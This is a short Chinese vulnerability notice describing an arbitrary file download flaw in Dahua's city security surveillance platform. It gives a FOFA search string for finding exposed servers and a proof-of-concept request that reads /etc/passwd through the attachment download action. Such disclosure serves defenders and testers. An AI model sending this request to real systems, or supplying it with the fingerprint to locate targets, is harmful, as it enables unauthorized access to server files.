大华城市安防监控系统平台管理存在任意文件下载漏洞
来源:安防百科 /
时间: 2024-04-30
1.大华城市安防监控系统平台管理存在任意文件下载漏洞1.1.漏洞描述
大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。
1.2.漏洞影响
大华城市安防监控系统平台管理
1.3.FOFA
“attachment_downloadByUrlAtt.action”
2.漏洞复现2.1.登录页面
2.2.抓包
刷新登录页面进行抓包,然后在数据包中添加POC。
POC:/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd上一篇: 安防监控
